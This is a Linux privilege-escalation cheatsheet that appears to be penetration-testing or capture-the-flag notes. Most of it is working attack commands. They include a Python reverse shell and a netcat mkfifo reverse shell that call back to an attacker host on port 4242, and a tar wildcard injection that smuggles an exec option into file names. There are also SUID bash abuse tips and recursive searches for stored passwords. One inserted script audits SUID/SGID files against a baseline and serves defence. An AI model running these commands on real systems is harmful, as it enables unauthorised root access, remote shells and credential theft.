# Linux Privilege Escalation

## Get tty (text terminal)

Start another netcat listener on your machine, then call back to it from the target with the Python reverse shell below (replace `<Kali IP>` with the listener's address):

```bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<Kali IP>",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

However, this shell is still not a real terminal (no job control, no line editing, `su`/`sudo` prompts misbehave), so we need a full tty for an interactive shell.

```bash
python -c 'import pty; pty.spawn("/bin/bash")'
# or, if only python3 is installed
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

```bash
export TERM=xterm   # gives us access to terminal commands such as clear
```

**Optional**, if the previous step does not give a fully working shell: press CTRL+Z to put the shell in the background, then type `stty raw -echo; fg` in the same window. This brings the shell back to the foreground with a fully interactive experience (tab completion, arrow keys, CTRL+C no longer kills the connection).

<https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys>

## Gather information and poke around

`history` review the shell history for hints about users, architecture and services

`su user` log in as another user

`sudo -l` list which commands the current user may run through sudo, and as which user

`cat /etc/crontab` `crontab -l` cron is your friend

`ls -l /bin/bash` `/bin/bash -p` an easy win if bash is SUID (`-p` keeps the elevated effective uid)

`sudo -u user command` run a command as another user

<https://www.cyberciti.biz/open-source/command-line-hacks/linux-run-command-as-different-user/>

<https://www.oreilly.com/library/view/linux-security-cookbook/0596003919/ch05s03.html>

## Exploiting SUID Executables (bash, binary)

```bash
find / -perm -1000 -type d 2>/dev/null   # Sticky bit - only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner
find / -perm /4000 -type f 2>/dev/null   # Using the chmod number
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null    # SGID or SUID; the parentheses are needed, otherwise -type f only applies to the SUID branch
```
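The same `find` predicates turned into a small audit script, added here as an example and not part of the original notes: it lists set-id files under a root and flags any that are missing from an administrator-maintained baseline, which is how a defender notices a newly planted SUID shell or a permission change. The baseline file (one absolute path per line, taken from a known-good host) and the `suid_audit` / `list_setid` names are assumptions.

```bash
#!/bin/sh
# Audit SUID/SGID files under a root directory against a baseline of expected paths.
# Usage: suid_audit <root> <baseline-file>
# Baseline format (assumption): one absolute path per line, e.g. /usr/bin/passwd

list_setid() {
    # Same predicates as the cheatsheet's find, with explicit grouping so that
    # -type f applies to both the SUID (4000) and SGID (2000) branches.
    find "$1" \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null | LC_ALL=C sort
}

suid_audit() {
    root=$1
    baseline=$2
    # Every set-id file that is not listed verbatim in the baseline is reported.
    list_setid "$root" | while IFS= read -r path; do
        if ! grep -qxF -- "$path" "$baseline"; then
            printf 'UNEXPECTED setid file: %s\n' "$path"
        fi
    done
}

# Example invocation against a real host (baseline path is an assumption):
#   suid_audit / /etc/setid-baseline.txt
```

Run it from cron and ship the output to your log collector; an empty report is the expected state.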

## Exploit tar wildcards

<https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/>

```bash
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip> 4242 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
```

## Automated tools and observation

`./linpeas.sh | tee linlog.txt` or [pspy](https://github.com/DominicBreuker/pspy) to watch processes and cron jobs run by other users without root

## Other Dirty Tricks

```bash
grep --color=always -rnw '/' -ie "PASSWORD=" 2>/dev/null   # recursive, case-insensitive, whole-word search for hard-coded passwords
```

```bash
locate password | more
```

## Expand knowledge and cheatsheet

* <https://github.com/netbiosX/Checklists/blob/master/Linux-Privilege-Escalation.md>
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Linux - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md)
* <https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html>
* <https://payatu.com/guide-linux-privilege-escalation>
* <https://tryhackme.com/room/linuxprivesc>
* <https://gtfobins.github.io/>
